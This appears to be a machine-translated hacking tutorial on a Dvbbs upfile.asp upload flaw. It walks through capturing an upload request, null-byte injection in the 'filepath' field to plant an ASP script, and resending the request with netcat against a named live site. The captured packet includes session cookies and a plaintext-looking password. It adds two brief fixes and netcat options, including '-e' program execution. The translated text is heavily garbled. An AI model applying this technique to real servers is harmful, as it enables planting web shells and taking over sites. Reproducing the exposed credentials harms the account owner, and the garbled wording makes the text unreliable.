PHP/ASP upload vulnerability

1: The transfer vulnerability is used only for asp and php scripts uploaded in form format. *** nc (netcat) is used to submit data packets. Run the following command on the dos interface: nc-vv www. ***. com 80 <1.txt-vv: Echo 80: www port 1.txt: is the data packet you want to send (for more usage, see this post) wse (wsockexpert) monitors local ports and captures packets submitted by ie
2: vulnerability principle the following example assumes the premise of www HOST: www. ***. com; bbs path:/bbs/the vulnerability is due to the study of File Uploading through the dynamic network. We recommend you have some programming experience to see the upfile of dvbbs. asp file, you do not need to fully understand that upfile is uploaded by generating a form table, the following variables are used: filepath default value uploadface attribute hiden act default value upload attribute hiden file1 is the key to the file to be uploaded is the filepath variable! By default, our files are uploaded to www. ***. the com/bbs/uploadface/file is named after the upload time, that is, the filename = formpath & year (now) & month (now) in the upfile) & day (now) & hour (now) & minute (now) & second (now) & rannum &". "& fileext ------------------------------------ we know that the data in the computer is" "for Peugeot, who have used C language knows that char data [] =" bbs ", the data array length is 4: B s what if we construct filepath as follows? Filepath = "/newmm. asp "when the file we uploaded in 2004.09.242.168.24 is changed but not changed: _ blank> http: // www. ***. com/bbs/uploadface/2004092402.16.jpg: _ blank> http: // www. ***. com/newmm. asp/2004092402.16.jpg. When the server receives filepath data, newmm is detected. after asp, it is understood that the data in filepath has ended the file we uploaded, such as c :. asp is saved as: _ blank> http: // www. ***. com/newmm. asp 3 Tools or filepath variables used (veteran's)... but the most basic is not changed .. There are similar vulnerabilities in website plug-ins. I would like to say that I should not rely on specialized tools to modify the filepath variable in the package caught by wse, and then submit it using nc... Even if he adds n hiden variables, it does not help. Of course, if we strictly filter filepath, these theories will end when our new theory was born! 4: detailed example: --------------------- one-second wsepacket (saved to 1.txt): post/bbs/upphoto/upfile. asp http/1.1 accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd. ms-excel, application/vnd. ms-powerpoint, application/msword, */* referer: _ blank> http://www.xin126.com/bbs/upphoto/upload.asp accept-language: zh-cn content-type: multipart/form-data; boundary = ---------- -7d423a138d0278 accept-encoding: gzip, deflate user-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1 ;. net clr 1.1.4322) host: _ blank> www.xin126.com content-length: 1969 connection: keep-alive cache-control: no-cache cookie: aspsessionidaccccdcs = njhcphpalbcankobechkjanf; iscome = 1; gamvancookies = 1; regtime = 2004% 2d9% 2d24 + 3% 3a39% 3a37; username = szjwwwww; pass = 5211314; dl = 0; userid = 62; ltstyle = 0; logintry = 1; userpass = eb03f6c72908fd84 ----------------------------- 7d423a138d0278 content-disposition: form-data; name = "filepath ".. /medias/myphoto/--------------------------- 7d423a138d0278 ...... upload --------------- 7d423a138d0278 ----------------- 、ultraeditopen 1.txt to change the data :...... ----------------------------- 7d423a138d0278 content-disposition: form-data; name = "filepath"/newmm. asp expose <=== this black represents The space is 0x20. Change it to 0x00 ...... -------------------------- 3. recalculate the cookie length, and then nc submits nc-vv _ blank> www.xin126.com 80 <1.txt ultraedit. It is a 16-bit editor which can be downloaded from the Internet. We mainly use it to write the ending Peugeot: ====> 16 bits indicate: 0x00 or 00 h. In fact, when you change the value, add a 00 at the end of the filepath to calculate the cookie length ==> after you change the fillepath, it must be or + or-the cookie length has changed ...... host: _ blank> www.xin126.com content-length: 1969 <====== is the connection: keep-alive cache-control: no-cache ...... computing? A letter or number is the solution to the Upload Vulnerability: (for reference only) 1. Generally, the upload path is treated as a variable ==> our countermeasure is to change filepath to a constant... This method is currently the most effective (I think) 2. Enhance the processing of the statement. It turns out that when we read it here, we will end the process where we continue to read the next variable, processing is OK. Attachment: NC Usage: Listening to external host nc [-options] hostname port [s] [ports]... listen to the local host nc-l-p port [options] [hostname] [port] options:-d detach from console, stealth mode-e prog inbound program to exec [dangerous!] -G gateway source-routing hop point [s], up to 8-g num source-routing pointer: 4, 8, 12 ,... -h this cruft-I secs delay interval for lines sent, ports scanned-l listen mode, for inbound connects-l listen harder, re-listen on socket close-n numeric-only ip addresses, no dns-o file hex dump of traffic-p port local port number-r randomize local and remote ports-s addr local source address-t answer telnet negotiation-u udp mode-v verbose [use twice to be more verbose]-w secs timeout for connects and final net reads-z zero-I/o mode [used for scanning] port numbers can be individual or ranges: m-n [random sive]